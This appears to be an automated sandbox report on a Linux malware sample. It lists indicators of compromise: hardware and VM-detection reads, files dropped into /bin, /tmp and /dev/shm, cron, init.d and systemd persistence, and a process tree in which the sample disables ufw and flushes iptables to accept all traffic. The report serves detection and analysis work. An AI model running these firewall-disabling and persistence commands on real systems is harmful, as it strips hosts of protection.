description ioc Process File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_version service-agent File opened for reading /sys/devices/virtual/dmi/id/board_name Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag Process not Found File opened for reading /sys/devices/virtual/dmi/id/bios_version Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_version Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag service-agent File opened for reading /sys/devices/virtual/dmi/id/board_version service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_serial Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_version Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag service-agent File opened for reading /sys/devices/virtual/dmi/id/board_version Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_uuid service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag service-agent File opened for reading /sys/devices/virtual/dmi/id/product_version Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_type Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_serial Process not Found File opened for reading /sys/devices/virtual/dmi/id/bios_version service-agent File opened for reading /sys/devices/virtual/dmi/id/product_uuid service-agent File opened for reading /sys/devices/virtual/dmi/id/board_name service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_serial Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_serial Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_version service-agent File opened for reading /sys/devices/virtual/dmi/id/board_serial Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_version Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag service-agent File opened for reading /sys/devices/virtual/dmi/id/board_serial Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_version Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_name service-agent File opened for reading /sys/devices/virtual/dmi/id/board_version service-agent File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_version service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_serial Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_serial service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_serial Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_name service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_version service-agent File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag service-agent File opened for reading /sys/devices/virtual/dmi/id/product_serial service-agent File opened for reading /sys/devices/virtual/dmi/id/product_uuid Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_name Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_version Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag service-agent File opened for reading /sys/devices/virtual/dmi/id/board_serial Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_version Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_type Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_serial Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_type service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_type service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_type service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/product_serial service-agent File opened for reading /sys/devices/virtual/dmi/id/product_uuid service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_date Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag Process not Found -
Writes file to system bin folder 53 IoCs
description ioc Process File opened for modification /bin/initdr Process not Found File opened for modification /bin/initdr Process not Found File opened for modification /bin/bprofr cp File opened for modification /bin/crondr cp File opened for modification /bin/sysdr cp File opened for modification /bin/initdr cp File opened for modification /bin/sysdr Process not Found File opened for modification /bin/crondr cp File opened for modification /bin/sysdr cp File opened for modification /bin/sysdr Process not Found File opened for modification /bin/sysdr Process not Found File opened for modification /bin/initdr Process not Found File opened for modification /bin/crondr cp File opened for modification /bin/sysdr Process not Found File opened for modification /bin/initdr Process not Found File opened for modification /bin/bprofr Process not Found File opened for modification /bin/bprofr cp File opened for modification /bin/crondr Process not Found File opened for modification /bin/sysdr Process not Found File opened for modification /bin/initdr Process not Found File opened for modification /bin/sysdr cp File opened for modification /bin/initdr cp File opened for modification /bin/crondr Process not Found File opened for modification /bin/sysdr Process not Found File opened for modification /bin/knlib5 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b File opened for modification /bin/initdr cp File opened for modification /bin/bprofr Process not Found File opened for modification /bin/crondr cp File opened for modification /bin/crondr cp File opened for modification /bin/crondr Process not Found File opened for modification /bin/crondr Process not Found File opened for modification /bin/sysdr cp File opened for modification /bin/sysdr cp File opened for modification /bin/bprofr Process not Found File opened for modification /bin/bprofr Process not Found File opened for modification /bin/crondr Process not Found File opened for modification /bin/bprofr cp File opened for modification /bin/crondr Process not Found File opened for modification /bin/bprofr Process not Found File opened for modification /bin/bprofr Process not Found File opened for modification /bin/crondr cp File opened for modification /bin/initdr cp File opened for modification /bin/initdr Process not Found File opened for modification /bin/bprofr cp File opened for modification /bin/initdr cp File opened for modification /bin/sysdr Process not Found File opened for modification /bin/bprofr Process not Found File opened for modification /bin/bprofr cp File opened for modification /bin/crondr Process not Found File opened for modification /bin/bprofr cp File opened for modification /bin/initdr Process not Found File opened for modification /bin/sysdr cp File opened for modification /bin/initdr cp -
Security Software Discovery 1 TTPs 26 IoCs
Adversaries may attempt to discover installed security software and its configurations.
pid Process 6490 Process not Found 2496 sh 3845 sh 4711 Process not Found 6046 Process not Found 6054 Process not Found 6498 Process not Found 7378 Process not Found 3381 sh 4281 Process not Found 5155 Process not Found 5163 Process not Found 5607 Process not Found 5599 Process not Found 6934 Process not Found 2071 sh 2504 sh 2941 sh 2949 sh 3837 sh 7386 Process not Found 2063 sh 3373 sh 4289 Process not Found 4719 Process not Found 6942 Process not Found -
resource yara_rule behavioral1/files/fstream-6.dat upx behavioral1/files/fstream-16.dat upx behavioral1/files/fstream-37.dat upx -
Checks CPU configuration 1 TTPs 64 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo service-agent -
Reads CPU attributes 1 TTPs 64 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online service-agent File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/possible Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/possible service-agent File opened for reading /sys/devices/system/cpu/online service-agent File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/types service-agent File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/possible service-agent File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/types service-agent File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/possible Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/types service-agent File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/types service-agent File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/possible service-agent File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online service-agent File opened for reading /sys/devices/system/cpu/types Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/types service-agent File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/possible Process not Found File opened for reading /sys/devices/system/cpu/possible Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/possible Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found -
Enumerates kernel/hardware configuration 1 TTPs 64 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map service-agent File opened for reading /sys/kernel/mm/hugepages service-agent File opened for reading /sys/bus/cpu/devices/cpu0/topology/physical_package_id Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/level Process not Found File opened for reading /sys/bus/cpu/devices Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/type service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map service-agent File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_id Process not Found File opened for reading /sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/type Process not Found File opened for reading /sys/devices/system/node/online service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map service-agent File opened for reading /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map Process not Found File opened for reading /sys/devices/virtual/dmi/id Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets service-agent File opened for reading /sys/bus/dax/target_node service-agent File opened for reading /sys/fs/cgroup/cpuset/cpuset.cpus Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_cpus Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/size service-agent File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_id Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets Process not Found File opened for reading /sys/module/x_tables/initstate modprobe File opened for reading /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages service-agent File opened for reading /sys/bus/node/devices/node0/meminfo service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/topology/die_cpus Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition Process not Found File opened for reading /sys/fs/cgroup/cpuset/cpuset.cpus Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size service-agent File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_cpus service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map Process not Found File opened for reading /sys/bus/node/devices/node0/meminfo Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_id Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index9/shared_cpu_map service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/level service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/level Process not Found File opened for reading /sys/fs/cgroup/cpuset/cpuset.mems Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map Process not Found File opened for reading /sys/bus/node/devices/node0/meminfo service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/type Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/type Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_cpus Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size service-agent File opened for reading /sys/bus/node/devices/node0/cpumap Process not Found File opened for reading /sys/kernel/mm/hugepages Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map Process not Found -
Process Discovery 1 TTPs 26 IoCs
Adversaries may try to discover information about running processes.
pid Process 6048 Process not Found 2498 ps 2943 ps 3375 ps 4292 Process not Found 5157 Process not Found 5166 Process not Found 5610 Process not Found 6945 Process not Found 7389 Process not Found 3384 ps 3839 ps 4713 Process not Found 4722 Process not Found 5601 Process not Found 6057 Process not Found 6936 Process not Found 2065 ps 2507 ps 2074 ps 2952 ps 3848 ps 4283 Process not Found 6492 Process not Found 6501 Process not Found 7380 Process not Found -
description ioc Process File opened for reading /proc/873/stat ps File opened for reading /proc/438/status Process not Found File opened for reading /proc/173/stat Process not Found File opened for reading /proc/392/cmdline Process not Found File opened for reading /proc/940/cmdline Process not Found File opened for reading /proc/971/cmdline Process not Found File opened for reading /proc/897/status Process not Found File opened for reading /proc/828/stat ps File opened for reading /proc/394/cmdline pkill File opened for reading /proc/16/cmdline Process not Found File opened for reading /proc/498/status Process not Found File opened for reading /proc/1392/status Process not Found File opened for reading /proc/79/stat Process not Found File opened for reading /proc/5043/cmdline Process not Found File opened for reading /proc/1/stat Process not Found File opened for reading /proc/15/stat Process not Found File opened for reading /proc/1189/cmdline ps File opened for reading /proc/878/cmdline pkill File opened for reading /proc/1069/status pkill File opened for reading /proc/502/cmdline pkill File opened for reading /proc/1088/stat ps File opened for reading /proc/618/status Process not Found File opened for reading /proc/175/status ps File opened for reading /proc/499/cmdline ps File opened for reading /proc/5/status Process not Found File opened for reading /proc/478/stat Process not Found File opened for reading /proc/572/status Process not Found File opened for reading /proc/14/status Process not Found File opened for reading /proc/1098/status ps File opened for reading /proc/453/stat ps File opened for reading /proc/453/stat Process not Found File opened for reading /proc/568/status Process not Found File opened for reading /proc/171/cmdline Process not Found File opened for reading /proc/105/status Process not Found File opened for reading /proc/926/stat ps File opened for reading /proc/979/cmdline ps File opened for reading /proc/170/cmdline pkill File opened for reading /proc/868/cmdline pkill File opened for reading /proc/5491/stat Process not Found File opened for reading /proc/1069/cmdline Process not Found File opened for reading /proc/10/status pgrep File opened for reading /proc/self/maps awk File opened for reading /proc/664/stat ps File opened for reading /proc/1253/status ps File opened for reading /proc/72/status Process not Found File opened for reading /proc/873/stat Process not Found File opened for reading /proc/1179/status Process not Found File opened for reading /proc/161/status Process not Found File opened for reading /proc/200/cmdline Process not Found File opened for reading /proc/78/status Process not Found File opened for reading /proc/540/status pkill File opened for reading /proc/1075/cmdline pkill File opened for reading /proc/519/cmdline ps File opened for reading /proc/1070/status pkill File opened for reading /proc/201/status Process not Found File opened for reading /proc/729/status Process not Found File opened for reading /proc/1113/status Process not Found File opened for reading /proc/437/status ps File opened for reading /proc/499/status pkill File opened for reading /proc/filesystems sed File opened for reading /proc/cmdline Process not Found File opened for reading /proc/1071/stat Process not Found File opened for reading /proc/84/stat Process not Found File opened for reading /proc/437/status Process not Found -
System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1592 bash 1593 bash 1596 bash 1597 bash 1400 modprobe -
Writes file to shm directory 1 IoCs
Malware can drop malicious files in the shm directory which will run directly from RAM.
description ioc Process File opened for modification /dev/shm/.klibsystem5 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b -
Writes file to tmp directory 42 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/~/.bash_profile sh File opened for modification /tmp/.lock service-agent File opened for modification /tmp/.bashirc sys-helper File opened for modification /tmp/~/.bash_profile Process not Found File opened for modification /tmp/.bashirc Process not Found File opened for modification /tmp/sys-helper 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b File opened for modification /tmp/.bashirc Process not Found File opened for modification /tmp/.lock Process not Found File opened for modification /tmp/.lock service-agent File opened for modification /tmp/.bashirc sys-helper File opened for modification /tmp/.bashirc sys-helper File opened for modification /tmp/~/.bash_profile sh File opened for modification /tmp/.lock Process not Found File opened for modification /tmp/.lock Process not Found File opened for modification /tmp/.lock Process not Found File opened for modification /tmp/~/.bash_profile Process not Found File opened for modification /tmp/.bashirc Process not Found File opened for modification /tmp/service-agent 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b File opened for modification /tmp/.lock service-agent File opened for modification /tmp/.bashirc Process not Found File opened for modification /tmp/.lock Process not Found File opened for modification /tmp/.bashirc sys-helper File opened for modification /tmp/.bashirc Process not Found File opened for modification /tmp/.lock Process not Found File opened for modification /tmp/~/.bash_profile Process not Found File opened for modification /tmp/.klibsystem5 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b File opened for modification /tmp/.lock service-agent File opened for modification /tmp/.lock service-agent File opened for modification /tmp/.lock service-agent File opened for modification /tmp/.bashirc Process not Found File opened for modification /tmp/.lock Process not Found File opened for modification /tmp/~/.bash_profile sh File opened for modification /tmp/.bashirc sys-helper File opened for modification /tmp/~/.bash_profile sh File opened for modification /tmp/~/.bash_profile Process not Found File opened for modification /tmp/~/.bash_profile Process not Found File opened for modification /tmp/.bashirc sys-helper File opened for modification /tmp/~/.bash_profile sh File opened for modification /tmp/~/.bash_profile sh File opened for modification /tmp/~/.bash_profile Process not Found File opened for modification /tmp/.bashirc Process not Found File opened for modification /tmp/~/.bash_profile Process not Found
Processes
-
/tmp/2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b/tmp/2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b1⤵
- Creates/modifies Cron job
- Modifies init.d
- Modifies systemd
- Writes file to system bin folder
- Writes file to shm directory
- Writes file to tmp directory
PID:1392 -
/usr/bin/bashbash -c "ufw disable"2⤵PID:1396
-
-
/usr/sbin/ufwufw disable2⤵
- Flushes firewall rules
PID:1396 -
/usr/sbin/iptables/usr/sbin/iptables -V3⤵PID:1397
-
-
/lib/ufw/ufw-init/lib/ufw/ufw-init force-stop3⤵PID:1398
-
/sbin/ip6tablesip6tables -L INPUT -n4⤵PID:1399
-
/sbin/modprobe/sbin/modprobe ip6_tables5⤵
- Loads a kernel module
- Enumerates kernel/hardware configuration
- System Network Configuration Discovery
PID:1400
-
-
-
/sbin/iptablesiptables -F ufw-logging-deny4⤵PID:1402
-
-
/sbin/iptablesiptables -F ufw-logging-allow4⤵PID:1406
-
-
/sbin/iptablesiptables -F ufw-not-local4⤵PID:1407
-
-
/sbin/iptablesiptables -F ufw-user-logging-input4⤵PID:1408
-
-
/sbin/iptablesiptables -F ufw-user-limit-accept4⤵PID:1409
-
-
/sbin/iptablesiptables -F ufw-user-limit4⤵PID:1410
-
-
/sbin/iptablesiptables -F ufw-skip-to-policy-input4⤵PID:1411
-
-
/sbin/iptablesiptables -F ufw-reject-input4⤵PID:1412
-
-
/sbin/iptablesiptables -F ufw-after-logging-input4⤵PID:1413
-
-
/sbin/iptablesiptables -F ufw-after-input4⤵PID:1414
-
-
/sbin/iptablesiptables -F ufw-user-input4⤵PID:1415
-
-
/sbin/iptablesiptables -F ufw-before-input4⤵PID:1416
-
-
/sbin/iptablesiptables -F ufw-before-logging-input4⤵PID:1417
-
-
/sbin/iptablesiptables -F ufw-skip-to-policy-forward4⤵PID:1418
-
-
/sbin/iptablesiptables -F ufw-reject-forward4⤵PID:1419
-
-
/sbin/iptablesiptables -F ufw-after-logging-forward4⤵PID:1420
-
-
/sbin/iptablesiptables -F ufw-after-forward4⤵PID:1421
-
-
/sbin/iptablesiptables -F ufw-user-logging-forward4⤵PID:1422
-
-
/sbin/iptablesiptables -F ufw-user-forward4⤵PID:1423
-
-
/sbin/iptablesiptables -F ufw-before-forward4⤵PID:1424
-
-
/sbin/iptablesiptables -F ufw-before-logging-forward4⤵PID:1425
-
-
/sbin/iptablesiptables -F ufw-track-forward4⤵PID:1426
-
-
/sbin/iptablesiptables -F ufw-track-output4⤵PID:1427
-
-
/sbin/iptablesiptables -F ufw-track-input4⤵PID:1428
-
-
/sbin/iptablesiptables -F ufw-skip-to-policy-output4⤵PID:1429
-
-
/sbin/iptablesiptables -F ufw-reject-output4⤵PID:1430
-
-
/sbin/iptablesiptables -F ufw-after-logging-output4⤵PID:1431
-
-
/sbin/iptablesiptables -F ufw-after-output4⤵PID:1432
-
-
/sbin/iptablesiptables -F ufw-user-logging-output4⤵PID:1433
-
-
/sbin/iptablesiptables -F ufw-user-output4⤵PID:1434
-
-
/sbin/iptablesiptables -F ufw-before-output4⤵PID:1435
-
-
/sbin/iptablesiptables -F ufw-before-logging-output4⤵PID:1436
-
-
/sbin/iptablesiptables -Z ufw-logging-deny4⤵PID:1437
-
-
/sbin/iptablesiptables -Z ufw-logging-allow4⤵PID:1438
-
-
/sbin/iptablesiptables -Z ufw-not-local4⤵PID:1439
-
-
/sbin/iptablesiptables -Z ufw-user-logging-input4⤵PID:1440
-
-
/sbin/iptablesiptables -Z ufw-user-limit-accept4⤵PID:1441
-
-
/sbin/iptablesiptables -Z ufw-user-limit4⤵PID:1442
-
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-input4⤵PID:1443
-
-
/sbin/iptablesiptables -Z ufw-reject-input4⤵PID:1444
-
-
/sbin/iptablesiptables -Z ufw-after-logging-input4⤵PID:1445
-
-
/sbin/iptablesiptables -Z ufw-after-input4⤵PID:1446
-
-
/sbin/iptablesiptables -Z ufw-user-input4⤵PID:1447
-
-
/sbin/iptablesiptables -Z ufw-before-input4⤵PID:1448
-
-
/sbin/iptablesiptables -Z ufw-before-logging-input4⤵PID:1449
-
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-forward4⤵PID:1450
-
-
/sbin/iptablesiptables -Z ufw-reject-forward4⤵PID:1451
-
-
/sbin/iptablesiptables -Z ufw-after-logging-forward4⤵PID:1452
-
-
/sbin/iptablesiptables -Z ufw-after-forward4⤵PID:1453
-
-
/sbin/iptablesiptables -Z ufw-user-logging-forward4⤵PID:1454
-
-
/sbin/iptablesiptables -Z ufw-user-forward4⤵PID:1455
-
-
/sbin/iptablesiptables -Z ufw-before-forward4⤵PID:1456
-
-
/sbin/iptablesiptables -Z ufw-before-logging-forward4⤵PID:1457
-
-
/sbin/iptablesiptables -Z ufw-track-forward4⤵PID:1458
-
-
/sbin/iptablesiptables -Z ufw-track-output4⤵PID:1459
-
-
/sbin/iptablesiptables -Z ufw-track-input4⤵PID:1460
-
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-output4⤵PID:1461
-
-
/sbin/iptablesiptables -Z ufw-reject-output4⤵PID:1462
-
-
/sbin/iptablesiptables -Z ufw-after-logging-output4⤵PID:1463
-
-
/sbin/iptablesiptables -Z ufw-after-output4⤵PID:1464
-
-
/sbin/iptablesiptables -Z ufw-user-logging-output4⤵PID:1465
-
-
/sbin/iptablesiptables -Z ufw-user-output4⤵PID:1466
-
-
/sbin/iptablesiptables -Z ufw-before-output4⤵PID:1467
-
-
/sbin/iptablesiptables -Z ufw-before-logging-output4⤵PID:1468
-
-
/sbin/iptablesiptables -X ufw-logging-deny4⤵PID:1469
-
-
/sbin/iptablesiptables -X ufw-logging-allow4⤵PID:1470
-
-
/sbin/iptablesiptables -X ufw-not-local4⤵PID:1471
-
-
/sbin/iptablesiptables -X ufw-user-logging-input4⤵PID:1472
-
-
/sbin/iptablesiptables -X ufw-user-logging-output4⤵PID:1473
-
-
/sbin/iptablesiptables -X ufw-user-logging-forward4⤵PID:1474
-
-
/sbin/iptablesiptables -X ufw-user-limit-accept4⤵PID:1475
-
-
/sbin/iptablesiptables -X ufw-user-limit4⤵PID:1476
-
-
/sbin/iptablesiptables -X ufw-user-input4⤵PID:1477
-
-
/sbin/iptablesiptables -X ufw-user-forward4⤵PID:1478
-
-
/sbin/iptablesiptables -X ufw-user-output4⤵PID:1479
-
-
/sbin/iptablesiptables -X ufw-skip-to-policy-input4⤵PID:1480
-
-
/sbin/iptablesiptables -X ufw-skip-to-policy-output4⤵PID:1481
-
-
/sbin/iptablesiptables -X ufw-skip-to-policy-forward4⤵PID:1482
-
-
/sbin/iptablesiptables -P INPUT ACCEPT4⤵PID:1483
-
-
/sbin/iptablesiptables -P OUTPUT ACCEPT4⤵PID:1484
-
-
/sbin/iptablesiptables -P FORWARD ACCEPT4⤵PID:1485
-
-
/sbin/ip6tablesip6tables -F ufw6-logging-deny4⤵PID:1486
-
-
